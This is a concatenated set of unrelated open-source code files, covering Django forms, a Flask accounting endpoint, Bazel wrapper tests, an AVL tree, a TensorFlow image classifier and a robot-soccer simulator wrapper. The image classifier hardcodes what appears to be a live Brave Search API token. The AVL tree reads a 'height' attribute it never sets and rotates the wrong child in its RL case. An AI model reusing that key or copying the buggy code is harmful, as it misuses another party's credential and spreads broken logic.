_DECIDE_LATER = \"decide_later\"\r\n\r\n _REVIEW_CHOICES = (\r\n (_APPROVE, \"Approve the request and add the user to this group.\"),\r\n (_REJECT, \"Reject the request and remove the user from this group.\"),\r\n (_DECIDE_LATER, \"Decide later.\"),\r\n )\r\n\r\n review = forms.ChoiceField(choices=_REVIEW_CHOICES, required=True, widget=forms.RadioSelect)\r\n\r\n def __init__(self, data=None, instance=None):\r\n if not instance:\r\n message = \"Failed to create review member form: this form must be bound to a member.\"\r\n raise ProgrammingError(message)\r\n elif instance.is_approved:\r\n message = \"Failed to create review member form: member is already approved.\"\r\n raise ProgrammingError(message)\r\n self._instance = instance\r\n initial = {\"review\": ReviewMemberForm._APPROVE}\r\n super(ReviewMemberForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def update(self):\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n review = self.cleaned_data[\"review\"]\r\n if review == ReviewMemberForm._APPROVE:\r\n self._instance.is_approved = True\r\n self._instance.save()\r\n elif review == ReviewMemberForm._REJECT:\r\n self._instance.delete()\r\n else:\r\n pass\r\n return self._instance\r\n\r\n\r\nclass MemberForm(forms.Form):\r\n\r\n _ROLE_CHOICES = (\r\n (Member.ADMINISTRATOR, \"Administrator - administrator can change group settings\"),\r\n (Member.MODERATOR, \"Moderator - moderator can approve pending members\"),\r\n (Member.MEMBER, \"Member - member can view the group contents\"),\r\n )\r\n\r\n role = forms.ChoiceField(choices=_ROLE_CHOICES, required=True, widget=forms.RadioSelect)\r\n remove_member = forms.BooleanField(required=False)\r\n\r\n def __init__(self, data=None, instance=None):\r\n self._instance = instance\r\n initial = {\"remove_member\": False}\r\n if instance:\r\n initial[\"role\"] = instance.role\r\n super(MemberForm, self).__init__(data=data, initial=initial)\r\n\r\n @property\r\n def instance(self):\r\n return self._instance\r\n\r\n def update(self):\r\n if self._instance is None:\r\n message = \"Failed to update member: this form is not bound to a member.\"\r\n raise ProgrammingError(message)\r\n if not self.is_valid():\r\n raise InvalidFormError(self.errors)\r\n if not self.cleaned_data[\"remove_member\"]:\r\n self._instance.role = self.cleaned_data[\"role\"]\r\n self._instance.save()\r\n else:\r\n self._instance.delete()\r\n return self._instance\r\n\r\n\r\n# EOF\r\n","repo_name":"BGCX262/zzheng-hg-to-git","sub_path":"friday/website/friday/apps/groups/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29391112832","text":"from main.function.update_table import UpdateTable\nfrom main.function.update_memorial import UpdateMemorial\nfrom ...model.accou_mdb import AccouMdb\nfrom ...schema.accou_mdb import accou_schema\nfrom ...model.memo_hdb import MemoHdb\nfrom ...schema.memo_hdb import MhdbSchema, mhdb_schema\nfrom ...model.ccost_mdb import CcostMdb\nfrom ...schema.ccost_mdb import ccost_schema\nfrom ...model.memo_ddb import MemoDdb\nfrom ...schema.memo_ddb import mddb_schema\nfrom ...model.bank_mdb import BankMdb\nfrom ...schema.bank_mdb import bank_schema\nfrom ...shared.shared import db\nfrom ...utils.response import response\nfrom sqlalchemy.exc import *\nfrom ...model.currency_mdb import CurrencyMdb\nfrom ...schema.currency_mdb import currency_schema\nfrom ...model.transddb import TransDdb\nfrom ...model.transbank import TransBank\n\n\nclass Memorial:\n def __new__(self, user, request):\n if request.method == \"POST\":\n try:\n code = request.json[\"code\"]\n date = request.json[\"date\"]\n desc = request.json[\"desc\"]\n memo = request.json[\"memo\"]\n\n m = MemoHdb(code, date, desc, False, user.id)\n\n db.session.add(m)\n db.session.commit()\n\n new_memo = []\n for x in memo:\n if x[\"dbcr\"] and x[\"amnt\"]:\n new_memo.append(\n MemoDdb(\n m.id,\n x[\"acc_id\"],\n x[\"bank_id\"],\n x[\"dep_id\"],\n x[\"currency\"],\n x[\"dbcr\"],\n x[\"amnt\"],\n x[\"amnh\"],\n x[\"desc\"],\n user.id,\n )\n )\n\n # print(len(new_memo))\n if len(new_memo) > 0:\n db.session.add_all(new_memo)\n db.session.commit()\n\n UpdateMemorial(m.id, False, user.id)\n\n print(new_memo)\n\n except Exception as e:\n print(e)\n db.session.rollback()\n db.session.close()\n return response(400, \"Kode sudah digunakan\", False, None)\n finally:\n return response(200, \"Berhasil\", True, mhdb_schema.dump(m))\n else:\n try:\n m = (\n MemoHdb.query.filter(MemoHdb.closing == False)\n .order_by(MemoHdb.id.desc())\n .all()\n )\n\n memo = (\n db.session.query(MemoDdb, AccouMdb, CcostMdb, CurrencyMdb, BankMdb)\n .outerjoin(AccouMdb, AccouMdb.id == MemoDdb.acc_id)\n .outerjoin(CcostMdb, CcostMdb.id == MemoDdb.dep_id)\n .outerjoin(CurrencyMdb, CurrencyMdb.id == MemoDdb.currency)\n .outerjoin(BankMdb, BankMdb.id == MemoDdb.bank_id)\n .all()\n )\n\n final = []\n for x in m:\n mm = []\n for y in memo:\n if x.id == y[0].mcode:\n y[0].acc_id = accou_schema.dump(y[1])\n y[0].dep_id = ccost_schema.dump(y[2])\n y[0].currency = currency_schema.dump(y[3]) if y[3] else None\n y[0].bank_id = bank_schema.dump(y[4]) if y[4] else None\n mm.append(mddb_schema.dump(y[0]))\n\n final.append(\n {\n \"id\": x.id,\n \"code\": x.code,\n \"date\": MhdbSchema(only=[\"date\"]).dump(x)[\"date\"],\n \"desc\": x.desc,\n \"imp\": x.imp,\n \"memo\": mm,\n }\n )\n\n return response(200, \"Berhasil\", True, final)\n except ProgrammingError as e:\n return UpdateTable(\n [MemoHdb, MemoDdb, AccouMdb, CcostMdb, CurrencyMdb], request\n )\n","repo_name":"FaaaDev/api.labha.id","sub_path":"main/function/memorial/memorial.py","file_name":"memorial.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22365747515","text":"\nfrom unittest.mock import AsyncMock, PropertyMock\n\nimport pytest\n\nimport abstracts\n\nfrom aio.api import bazel\n\n\n@abstracts.implementer(bazel.ABazel)\nclass DummyBazel:\n\n @property\n def bazel_path(self):\n return super().bazel_path\n\n @property\n def path(self):\n return super().path\n\n\n@abstracts.implementer(bazel.ABazelCommand)\nclass DummyBazelCommand(DummyBazel):\n pass\n\n\n@pytest.mark.parametrize(\"bazel_path\", [None, \"\", \"BAZEL PATH\"])\ndef test_base_bazel_constructor(bazel_path):\n kwargs = (\n dict(bazel_path=bazel_path)\n if bazel_path is not None\n else {})\n\n with pytest.raises(TypeError):\n bazel.ABazel(\"PATH\", **kwargs)\n\n base = DummyBazel(\"PATH\", **kwargs)\n assert base._path == \"PATH\"\n assert base._bazel_path == bazel_path\n\n\n@pytest.mark.parametrize(\"bazel_path\", [None, \"\", \"BAZEL PATH\"])\n@pytest.mark.parametrize(\"which\", [None, \"\", \"FOUND BAZEL PATH\"])\ndef test_base_bazel_bazel_path(patches, bazel_path, which):\n base = DummyBazel(\"PATH\")\n patched = patches(\n \"pathlib\",\n \"shutil\",\n prefix=\"aio.api.bazel.abstract.base\")\n base._bazel_path = bazel_path\n\n with patched as (m_plib, m_shutil):\n m_shutil.which.return_value = which\n\n if not bazel_path and not which:\n with pytest.raises(bazel.BazelError) as e:\n base.bazel_path\n assert (\n e.value.args[0]\n == \"No path supplied, and `bazel` command not found\")\n else:\n assert base.bazel_path == m_plib.Path.return_value\n\n assert \"bazel_path\" not in base.__dict__\n if bazel_path:\n assert not m_shutil.which.called\n assert (\n m_plib.Path.call_args\n == [(bazel_path, ), {}])\n return\n assert (\n m_shutil.which.call_args\n == [(\"bazel\", ), {}])\n if not which:\n assert not m_plib.Path.called\n else:\n assert (\n m_plib.Path.call_args\n == [(which, ), {}])\n\n\ndef test_base_bazel_path(patches):\n base = DummyBazel(\"PATH\")\n patched = patches(\n \"pathlib\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_plib, ):\n assert base.path == m_plib.Path.return_value\n\n assert (\n m_plib.Path.call_args\n == [(\"PATH\", ), {}])\n assert \"path\" not in base.__dict__\n\n\n@pytest.mark.parametrize(\"bazel_path\", [None, \"\", \"BAZEL PATH\"])\ndef test_base_bazel_command_constructor(bazel_path):\n kwargs = (\n dict(bazel_path=bazel_path)\n if bazel_path is not None\n else {})\n\n with pytest.raises(TypeError):\n bazel.ABazelCommand(\"PATH\", **kwargs)\n\n command = DummyBazelCommand(\"PATH\", **kwargs)\n assert command._path == \"PATH\"\n assert command._bazel_path == bazel_path\n\n\ndef test_base_bazel_command_executor(patches):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"concurrent.futures\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_futures, ):\n assert (\n command.executor\n == m_futures.ThreadPoolExecutor.return_value)\n\n assert (\n m_futures.ThreadPoolExecutor.call_args\n == [(), {}])\n assert \"executor\" not in command.__dict__\n\n\ndef test_base_bazel_command_loop(patches):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"asyncio\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_aio, ):\n assert (\n command.loop\n == m_aio.get_running_loop.return_value)\n\n assert (\n m_aio.get_running_loop.call_args\n == [(), {}])\n assert \"loop\" not in command.__dict__\n\n\n@pytest.mark.parametrize(\n \"args\", [[], [f\"ARG{i}\" for i in range(0, 5)]])\n@pytest.mark.parametrize(\n \"kwargs\", [{}, {f\"K{i}\": f\"V{i}\" for i in range(0, 5)}])\nasync def test_base_bazel_command_subproc_run(patches, args, kwargs):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n (\"ABazelCommand.executor\",\n dict(new_callable=PropertyMock)),\n \"ABazelCommand._run_in_executor\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_exec, m_run):\n assert (\n await command.subproc_run(*args, **kwargs)\n == m_run.return_value)\n\n assert (\n m_run.call_args\n == [(m_exec.return_value.__enter__.return_value, ) + tuple(args),\n kwargs])\n\n\n@pytest.mark.parametrize(\n \"args\", [[], [f\"ARG{i}\" for i in range(0, 5)]])\n@pytest.mark.parametrize(\n \"kwargs\", [{}, {f\"K{i}\": f\"V{i}\" for i in range(0, 5)}])\nasync def test_base_bazel_command__run_in_executor(patches, args, kwargs):\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"partial\",\n (\"ABazelCommand.loop\",\n dict(new_callable=PropertyMock)),\n \"ABazelCommand._subproc_run\",\n prefix=\"aio.api.bazel.abstract.base\")\n\n with patched as (m_partial, m_loop, m_run):\n m_loop.return_value.run_in_executor = AsyncMock()\n assert (\n await command._run_in_executor(\"POOL\", *args, **kwargs)\n == m_loop.return_value.run_in_executor.return_value)\n\n assert (\n m_loop.return_value.run_in_executor.call_args\n == [(\"POOL\", m_partial.return_value), {}])\n assert (\n m_partial.call_args\n == [(m_run, ) + tuple(args), kwargs])\n\n\n@pytest.mark.parametrize(\n \"args\", [[], [f\"ARG{i}\" for i in range(0, 5)]])\n@pytest.mark.parametrize(\n \"kwargs\", [{}, {f\"K{i}\": f\"V{i}\" for i in range(0, 5)}])\n@pytest.mark.parametrize(\"cwd\", [None, \"CWD\"])\n@pytest.mark.parametrize(\"capture\", [None, \"CAPTURE\"])\ndef test_base_bazel_command__subproc_run(\n patches, args, kwargs, cwd, capture):\n kwargs = kwargs.copy()\n command = DummyBazelCommand(\"PATH\")\n patched = patches(\n \"subprocess\",\n (\"ABazelCommand.path\",\n dict(new_callable=PropertyMock)),\n prefix=\"aio.api.bazel.abstract.base\")\n if cwd:\n kwargs[\"cwd\"] = cwd\n if capture:\n kwargs[\"capture_output\"] = capture\n expected = kwargs.copy()\n\n with patched as (m_subproc, m_path):\n assert (\n command._subproc_run(*args, **kwargs)\n == m_subproc.run.return_value)\n\n if not cwd:\n expected[\"cwd\"] = m_path.return_value\n else:\n assert not m_path.called\n if not capture:\n expected[\"capture_output\"] = True\n assert (\n m_subproc.run.call_args\n == [tuple(args), expected])\n","repo_name":"envoyproxy/toolshed","sub_path":"aio.api.bazel/tests/test_abstract_base.py","file_name":"test_abstract_base.py","file_ext":"py","file_size_in_byte":6481,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"5862067502","text":"# encoding=utf8\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.depth = 0\n self.parent = None\n\nclass AVLTree:\n def __init__(self):\n self.root = None\n\n def find(self, key):\n if not self.root:\n raise Exception('empty')\n return self._find(key, self.root)\n\n def _find(self, key, node):\n if not node:\n raise Exception('not found')\n if node.data == key:\n return node\n if key < node.data:\n return self._find(key, node.left)\n return self._find(key, node.right)\n\n def height(self, node):\n if not node:\n return -1\n return node.height\n\n def singleRight(self, node):\n left = node.left\n node.left = left.right\n left.right = node\n left.height = max(self.height(left.right), self.height(left.left)) + 1\n node.height = max(self.height(node.right), self.height(node.left)) + 1\n return left\n\n def singleLeft(self, node):\n right = node.right\n node.right = right.left\n right.left = node\n right.height = max(self.height(right.right), self.height(right.left)) + 1\n node.height = max(self.height(node.right), self.height(node.left)) + 1\n return right\n\n def LR(self, node):\n self.singleLeft(node.left)\n return self.singleRight(node)\n\n def RL(self, node):\n self.singleRight(node.left)\n return self.singleLeft(node)\n\n","repo_name":"lakeo/practise","sub_path":"avl.py","file_name":"avl.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21711267659","text":"from sqlalchemy import create_engine, MetaData\nfrom sqlalchemy import Table, Column, Integer, String, Text, ForeignKey\nfrom sqlalchemy.orm import mapper, scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\ndburl = 'sqlite:///data.sqlite'\n\nengine = create_engine(dburl, convert_unicode=True)\ndb_session = scoped_session(sessionmaker(\n autocommit=False, autoflush=False, bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n# metadata = MetaData()\nmetadata = Base.metadata\n\nusers = Table(\n 'users', metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String(50), unique=True),\n Column('email', String(120), unique=True)\n)\n\nposts = Table(\n 'posts', metadata,\n Column('id', Integer, primary_key=True),\n Column('title', String(128)),\n Column('content', Text())\n)\n\ntags = Table(\n 'tags', metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String(64))\n)\n\nposts_tags_table = Table(\n 'posts_tags', metadata,\n Column('post_id', Integer, ForeignKey('posts.id')),\n Column('tag_id', Integer, ForeignKey('tags.id'))\n)\n\n\ndef init_db():\n Base.metadata.drop_all(bind=engine)\n Base.metadata.create_all(bind=engine)\n\n con = engine.connect()\n con.execute(users.insert(), name='admin', email='admin@localhost')\n for i in range(20):\n con.execute(users.insert(),\n name=f'user{i}',\n email=f'user{i}@localhost')\n\n\nif __name__ == \"__main__\":\n init_db()\n","repo_name":"AngelLiang/Flask-Demos","sub_path":"AD12-flask-admin-sqla-automap-demo/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"35983291304","text":"a, b = list(map(int, input().split()))\nn = int(input())\n\n\ndef solution(a, b, n):\n [numbers, number] = [list(map(int, input().split())), 0]\n for i in range(n):\n number += numbers[i] * a**(n-1-i)\n numbers = []\n while number >= b:\n numbers.append(number % b)\n number //= b\n numbers.append(number)\n return ' '.join(map(str, numbers[::-1]))\n\n\nprint(solution(a, b, n))\n","repo_name":"TERADA-DANTE/algorithm","sub_path":"python/acmicpc/solved/_11576.py","file_name":"_11576.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17052749956","text":"import matplotlib.pylab as plt\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\nmodel = tf.keras.Sequential(\n [\n hub.KerasLayer(\n name=\"inception_v1\",\n handle=\"https://tfhub.dev/google/imagenet/inception_v1/classification/5\",\n trainable=False,\n ),\n ]\n)\nmodel.build([None, 224, 224, 3])\n# model.summary()\n\n\n# Loading dataset labels of model ImageNet\ndef load_imagenet_labels(file_path):\n labels_file = tf.keras.utils.get_file(\"ImageNetLabels.txt\", file_path)\n with open(labels_file) as reader:\n f = reader.read()\n labels = f.splitlines()\n return np.array(labels)\n\n\n# Here the image is processedby tensor flow in the right format\ndef read_image(file_name):\n image = tf.io.read_file(file_name)\n image = tf.io.decode_jpeg(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.image.resize_with_pad(image, target_height=224, target_width=224)\n return image\n\n\n# The file is applied to the model\ndef top_k_predictions(img, k=1):\n imagenet_labels = load_imagenet_labels(\n \"https://storage.googleapis.com/download.tensorflow.org/data/ImageNetLabels.txt\"\n )\n image_batch = tf.expand_dims(img, 0)\n predictions = model(image_batch)\n probs = tf.nn.softmax(\n predictions, axis=-1\n ) # trasforma i numeri in una sorta di probabilita\n top_probs, top_idxs = tf.math.top_k(input=probs, k=k)\n top_labels = imagenet_labels[tuple(top_idxs)]\n return top_labels, top_probs[0] # why do we return index 0 here?\n\n\nimport requests\nimport json\nimport tempfile\n\n\ndef pred_query(query, n=3):\n res = requests.get(\n f\"https://api.search.brave.com/res/v1/images/search?q={'+'.join(query.split(' '))}&safesearch=strict&count={n}&search_lang=en&country=us&spellcheck=1\",\n headers={\n \"Accept\": \"application/json\",\n \"Accept-Encoding\": \"gzip\",\n \"X-Subscription-Token\": \"BSArCBHslQs8k4GSeCIT_GgG7hVOQIY\",\n },\n )\n res = json.loads(res.text)\n out = []\n for i in range(n):\n try:\n img_url = res[\"results\"][i][\"thumbnail\"][\"src\"]\n img_path = tf.keras.utils.get_file(\n tempfile.mktemp(), img_url\n ) # viene salvato in una cartella temporanea\n img = read_image(img_path)\n pred_label, pred_prob = top_k_predictions(img, k=3)\n print(pred_label)\n out.append(\"camera\" in \",\".join(pred_label))\n except:\n pass\n if len(out) == 0:\n print(\"no image found for query:\", query)\n return False\n return sum(out) / len(out) >= 0.5\n\n\nif __name__ == \"__main__\":\n query = \"Polenta\"\n res = requests.get(\n f\"https://api.search.brave.com/res/v1/images/search?q={'+'.join(query.split(' '))}&safesearch=strict&count=1&search_lang=en&country=us&spellcheck=1\",\n headers={\n \"Accept\": \"application/json\",\n \"Accept-Encoding\": \"gzip\",\n \"X-Subscription-Token\": \"BSArCBHslQs8k4GSeCIT_GgG7hVOQIY\",\n },\n )\n res = json.loads(res.text)\n img_url = res[\"results\"][0][\"thumbnail\"][\"src\"]\n img_path = tf.keras.utils.get_file(tempfile.mktemp(), img_url)\n img = read_image(img_path)\n\n plt.imshow(img)\n plt.title(img_path, fontweight=\"bold\")\n plt.axis(\"off\")\n plt.show()\n\n pred_label, pred_prob = top_k_predictions(img)\n\n # condition is applied to what we return\n\n if \"camera\" in pred_label[0]:\n print(f\"it is a camera ({pred_label[0]}: {pred_prob[0]:0.1%})\")\n else:\n print(f\"it is NOT a camera ({pred_label[0]}: {pred_prob[0]:0.1%})\")\n","repo_name":"RikardDM/cameraProject","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25495936427","text":"import glob\nimport os\nimport pyasdf\nimport obspy\nimport numpy as np\nfrom obspy.geodetics.base import gps2dist_azimuth\nfrom PickReview.utils import *\nfrom PickReview.nlloc_utils import run_nonlinloc\nfrom PickReview.plotting import plot_scatter\nimport logging\nLogger = logging.getLogger(__name__)\nlogging.basicConfig(\n level=logging.WARNING,\n format=\"%(asctime)s\\t%(name)s\\t%(levelname)s\\t%(message)s\")\n\n\ndef run_snuffler(stream, events, markers, inventory, ntracks=12):\n \"\"\"\n Launch Pyrocko Snuffler to review picks\n :param stream: Obspy.Stream\n :param events: Obspy Event or Catalog\n :param markers: list of Pyrocko Markers\n :param inventory: Obspy Inventory\n :return: return_tag, list of reviewed Pyrocko Markers\n \"\"\"\n if isinstance(events, obspy.core.event.Event):\n catalog = obspy.Catalog(events=[event])\n else:\n catalog = events\n if inventory:\n return_tag, markers_out = stream.snuffle(catalog=catalog, inventory=inventory, markers=markers, ntracks=ntracks)\n else:\n return_tag, markers_out = stream.snuffle(catalog=catalog, markers=markers, ntracks=ntracks)\n return return_tag, markers_out\n\n\nif __name__ == \"__main__\":\n\n flist = glob.glob(\"/home/genevieve/research/quakemigrate/cami/dets_fromscamp_h5/2020031*.h5\")\n for filename in flist:\n\n #print(f\"H5 file: {filename}\")\n\n # Open H5 file and extract event and stream\n ds = pyasdf.ASDFDataSet(filename=filename)\n event = ds.events[0].copy()\n stream = obspy.Stream()\n for id in ds.waveforms.list():\n stream += ds.waveforms[id][\"raw_recording\"]\n del ds\n\n # Criterion for analysis\n reflat = 50.4502915\n reflon = -112.120833\n refdepth = -543\n tup = gps2dist_azimuth(event.preferred_origin().latitude, event.preferred_origin().longitude, reflat, reflon)\n distance = np.sqrt(tup[0] ** 2 + (event.preferred_origin().depth - refdepth) ** 2)\n if distance > 50:\n continue\n print(event.preferred_origin())\n\n # Get Pyrocko markers from previous picks\n picks, _ = fix_picks_ids(event, stream, method=\"modelled\")\n markers = picks2markers(picks, event=event, phase=True, kinds=(1, 2))\n\n # Re-pick using snuffler\n return_tag, markers_out = run_snuffler(stream, events=event, markers=markers, inventory=None)\n #print(f\"Return tag: {return_tag}\")\n if not return_tag:\n continue\n\n # Run NonLinLoc with new picks\n run_dir = \"/home/genevieve/research/PickReview/NonLinLoc/temp_dir\"\n for f in glob.glob(os.path.join(run_dir, \"*\")): # Clean out dir\n os.remove(f)\n fname = os.path.join(run_dir, \"phases.obs\")\n write_obs(phase_markers=markers_out, fname=fname)\n run_nonlinloc(fname)\n\n # Plot new location\n previous_origin = event.preferred_origin()\n previous_origin.depth += 774\n plot_scatter(hypfile=\"/home/genevieve/research/PickReview/NonLinLoc/temp_dir/last.hyp\")\n\n # Save new location and picks in a directory (.hyp file)\n savedir = \"/home/genevieve/research/PickReview/NonLinLoc/save_dir/\"\n dum = os.path.split(glob.glob(os.path.join(run_dir, \"result.2*.grid0.loc.hyp\"))[0])[1].split(\".\")\n code = \".\".join(dum[1:3])\n os.rename(fname, os.path.join(savedir, \"result.\" + code + \".obs\"))\n\n outfiles = glob.glob(os.path.join(run_dir, \"result.*.grid0.loc*\"))\n for f in outfiles:\n fc = os.path.split(f)[1]\n if \"sum\" in fc:\n os.rename(f, os.path.join(savedir, fc.replace(\"sum\", code)))\n else:\n os.rename(f, os.path.join(savedir, fc))","repo_name":"savardge/PickReview","sub_path":"PickReview/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4695433416","text":"# Author: Jochen Gast \r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom losses import factory\r\n\r\n\r\nclass ClassificationLoss(nn.Module):\r\n def __init__(self, args, topk=(1, 2, 3), reduction='mean'):\r\n super().__init__()\r\n self.args = args\r\n self.cross_entropy = torch.nn.CrossEntropyLoss(reduction=reduction)\r\n self.topk = topk\r\n\r\n @staticmethod\r\n def accuracy(output, target, topk=(1,)):\r\n maxk = max(topk)\r\n batch_size = target.size(0)\r\n _, pred = output.topk(maxk, 1, True, True)\r\n pred = pred.t()\r\n correct = pred.eq(target.view(1, -1))\r\n res = []\r\n for k in topk:\r\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\r\n res.append(correct_k.mul_(100.0 / batch_size))\r\n return res\r\n\r\n def forward(self, output_dict, target_dict):\r\n output = output_dict[\"output1\"]\r\n target = target_dict[\"target1\"]\r\n # compute actual losses\r\n cross_entropy = self.cross_entropy(output, target)\r\n # create dictonary for losses\r\n loss_dict = {\r\n \"xe\": cross_entropy,\r\n }\r\n acc_k = ClassificationLoss.accuracy(output, target, topk=self.topk)\r\n for acc, k in zip(acc_k, self.topk):\r\n loss_dict[\"top%i\" % k] = acc\r\n return loss_dict\r\n\r\n\r\nfactory.register(\"ClassificationLoss\", ClassificationLoss)\r\n","repo_name":"visinf/deblur-devil","sub_path":"losses/classification_losses.py","file_name":"classification_losses.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"31"} +{"seq_id":"29029383068","text":"ani_book = input()\ncount_book = 0\n\nwhile True:\n book = input()\n\n if book == ani_book:\n print(f\"You checked {count_book} books and found it.\")\n break\n if book == \"No More Books\":\n print(\"The book you search is not here!\")\n print(f\"You checked {count_book} books.\")\n break\n if book != ani_book:\n count_book += 1\n continue\n\n","repo_name":"ilchevai/SoftUni","sub_path":"Programing basic june 2022/while_loop_exercise/old_book.py","file_name":"old_book.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25251445017","text":"import robosim\nimport numpy as np\nfrom typing import Dict, List\nfrom Entities import *\nfrom rsim.Render_gym import RCGymRender\n\n\ndef clip(val, vmin, vmax):\n return min(max(val, vmin), vmax)\n\ndef normX(x):\n return clip(x / 0.85, -1.2, 1.2)\n\n\ndef normVx(v_x):\n return clip(v_x / 0.8, -1.25, 1.25)\n\n\ndef normVt(vt):\n return clip(vt / 573, -1.2, 1.2)\n\nclass RSim:\n def __init__(self, field_type: int = 0, n_robots_blue: int =3,\n n_robots_yellow: int=3, time_step_ms: int=16):\n self.n_robots_blue = n_robots_blue\n self.n_robots_yellow = n_robots_yellow\n self.view = None\n\n # Positions needed just to initialize the simulator\n ball_pos = [0, 0, 0, 0]\n blue_robots_pos = [[-0.2 * i, 0, 0]\n for i in range(1, n_robots_blue + 1)]\n yellow_robots_pos = [[0.2 * i, 0, 0]\n for i in range(1, n_robots_yellow + 1)]\n\n self.simulator = self._init_simulator(field_type=field_type,\n n_robots_blue=n_robots_blue,\n n_robots_yellow=n_robots_yellow,\n ball_pos=ball_pos,\n blue_robots_pos=blue_robots_pos,\n yellow_robots_pos=yellow_robots_pos,\n time_step_ms=time_step_ms)\n \n self.field_params = self.get_field_params()\n\n def reset(self, frame: Frame):\n placement_pos = self._placement_dict_from_frame(frame)\n self.simulator.reset(**placement_pos)\n\n def stop(self):\n del(self.simulator)\n\n def send(self, commands):\n sim_commands = np.zeros(\n (self.n_robots_blue + self.n_robots_yellow, 2), dtype=np.float64)\n\n for cmd in commands:\n if cmd.yellow:\n rbt_id = self.n_robots_blue + cmd.id\n else:\n rbt_id = cmd.id\n # convert from linear speed to angular speed\n sim_commands[rbt_id][0] = cmd.v_wheel1\n sim_commands[rbt_id][1] = cmd.v_wheel2\n self.simulator.step(sim_commands)\n self.render()\n\n def receive(self) -> Frame:\n state = self.simulator.get_state()\n # Update frame with new state\n self.frame = Frame()\n self.frame.parse(state)\n\n return self._frame_to_observations()\n\n def get_field_params(self):\n return self.simulator.get_field_params()\n \n def _placement_dict_from_frame(self, frame: Frame):\n replacement_pos: Dict[str, np.ndarray] = {}\n\n ball_pos: List[float] = [frame.ball.x, frame.ball.y,\n frame.ball.v_x, frame.ball.v_y]\n replacement_pos['ball_pos'] = np.array(ball_pos)\n\n blue_pos: List[List[float]] = []\n for robot in frame.robots_blue.values():\n robot_pos: List[float] = [robot.x, robot.y, robot.theta]\n blue_pos.append(robot_pos)\n replacement_pos['blue_robots_pos'] = np.array(blue_pos)\n\n yellow_pos: List[List[float]] = []\n for robot in frame.robots_yellow.values():\n robot_pos: List[float] = [robot.x, robot.y, robot.theta]\n yellow_pos.append(robot_pos)\n replacement_pos['yellow_robots_pos'] = np.array(yellow_pos)\n\n return replacement_pos\n\n def _init_simulator(self, field_type, n_robots_blue, n_robots_yellow,\n ball_pos, blue_robots_pos, yellow_robots_pos,\n time_step_ms):\n\n return robosim.SimulatorVSS(\n field_type=field_type,\n n_robots_blue=n_robots_blue,\n n_robots_yellow=n_robots_yellow,\n ball_pos=ball_pos,\n blue_robots_pos=blue_robots_pos,\n yellow_robots_pos=yellow_robots_pos,\n time_step_ms=time_step_ms\n )\n\n def _frame_to_observations(self):\n\n observation = []\n\n observation.append(normX(self.frame.ball.x))\n observation.append(normX(self.frame.ball.y))\n observation.append(normVx(self.frame.ball.v_x))\n observation.append(normVx(self.frame.ball.v_y))\n\n for i in range(3):\n observation.append(normX(self.frame.robots_blue[i].x))\n observation.append(normX(self.frame.robots_blue[i].y))\n observation.append(\n np.sin(np.deg2rad(self.frame.robots_blue[i].theta))\n )\n observation.append(\n np.cos(np.deg2rad(self.frame.robots_blue[i].theta))\n )\n observation.append(normVx(self.frame.robots_blue[i].v_x))\n observation.append(normVx(self.frame.robots_blue[i].v_y))\n observation.append(normVt(self.frame.robots_blue[i].v_theta))\n\n for i in range(3):\n observation.append(normX(self.frame.robots_yellow[i].x))\n observation.append(normX(self.frame.robots_yellow[i].y))\n observation.append(normVx(self.frame.robots_yellow[i].v_x))\n observation.append(normVx(self.frame.robots_yellow[i].v_y))\n observation.append(normVt(self.frame.robots_yellow[i].v_theta))\n \n return np.array(observation, dtype=np.float32)\n \n def render(self, mode = None) -> None:\n '''\n Renders the game depending on \n ball's and players' positions.\n\n Parameters\n ----------\n None\n\n Returns\n -------\n None\n\n '''\n if self.view == None:\n self.view = RCGymRender(self.n_robots_blue,\n self.n_robots_yellow,\n self.field_params,\n simulator='vss')\n\n self.view.render_frame(self.frame)\n 